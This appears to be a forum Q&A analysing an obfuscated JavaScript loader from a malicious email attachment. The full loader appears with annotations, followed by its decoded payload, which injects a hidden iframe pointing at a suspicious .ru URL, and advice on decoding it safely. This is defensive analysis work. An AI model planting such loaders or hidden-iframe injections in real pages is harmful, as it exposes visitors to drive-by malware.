I received the following in an email attachment today stating that it was a confirmation for a ticket that I supposedly bought. Please help me understand how one would go about deconstructing this code...
<script>
// Obfuscated loader taken from a malicious e-mail attachment, reproduced unchanged for analysis.
// It rebuilds JavaScript source text from a list of numbers and hands that text to eval.
// Only the final e(s) call executes the rebuilt text; everything before it just builds a string.
c = 2;
// i evaluates to 0 and is used as the loop index further down.
i = c - 2;
// Continues only when window.document is truthy.
// NOTE(review): presumably a check for a real browser page rather than an analysis harness — intent not shown here.
if (window.document) try {
// c is the number 2, so c.prototype is undefined and `new` on it throws.
// The throw appears deliberate: all remaining logic sits in the catch block.
new c.prototype
} catch (hgberger) {
// A single string of decimal values joined by 'n'; split('n') turns it into an array of numeric strings.
// Each entry is a character code shifted down by 38 (the loop below adds 38 back).
f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
// md is assigned but never read in the visible code.
md = 'a';
// Fetches eval through a concatenated property name, so the literal identifier never appears in the source.
// NOTE(review): likely meant to slip past simple string-matching scanners.
e = window["e" + "val"];
// w and r are plain aliases for the number list and the String constructor.
w = f;
// s starts as an empty array; the first += below coerces it to a string.
s = [];
r = String;
// Walks entries 0..612; the hard-coded bound 613 is presumably the number of entries in the list.
for (; 613 != i; i += 1) {
j = i;
// 1 * w[j] converts the numeric string to a number; adding 38 restores the original character code.
s += r.fromCharCode(38 + 1 * w[j]);
}
// Executes the decoded text as script in the current page.
// For analysis, this is the one call to replace with a display-only call so the text is shown, not run.
e(s);
}</script>
Unobfuscated:
// Decoded payload as posted in this answer: the text the loader passes to eval.
// Visible effect: the page loads a remote URL inside an invisible 10x10 iframe.
// The host, port and path in the two string literals are the network indicators for this sample.
// If a <body> element already exists, the iframe is built through the DOM.
// iframer() can be called before its definition because function declarations are hoisted.
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
// No <body> yet: the same iframe is written straight into the document as markup.
// visibility:hidden plus absolute positioning at 0,0 keeps it out of sight.
document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Creates the hidden iframe element and appends it to the first <body> element.
function iframer(){
// Same source URL, size and hiding styles as the document.write branch above.
var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
// Appending the element is what makes the browser request the remote page.
document.getElementsByTagName('body')[0].appendChild(f);
}
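I took the code you posted, and pasted it verbatim into http://jsfiddle.net. The only thing I changed (and I recommend this) was changing the call to `e(s)` to `alert(s)`. That way, your browser won't try to execute the embedded code, but just display it for you. Everything before that call only builds the string `s`, so the final call alone decides whether the decoded text is run or shown. Make the substitution in a text editor before loading the script anywhere, ideally in a disposable browser profile or VM, because a missed call to `e` would still execute the payload.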
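You'll see some dodgy stuff about iframes and dnvfodooshdkfhha.ru, which seems spammy. More precisely, the decoded script adds a hidden 10×10 iframe that loads a page from that host, so the browser would fetch content from it without showing anything on screen.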
It looks like that string is a list of character codes separated by 'n's. The loop adds 38 to each number and converts it to a character with `String.fromCharCode`, building up the string `s`. If you run the code with the last line changed from `e(s)` to `alert(s)`, you will see the hidden code that your malware is trying to `eval`.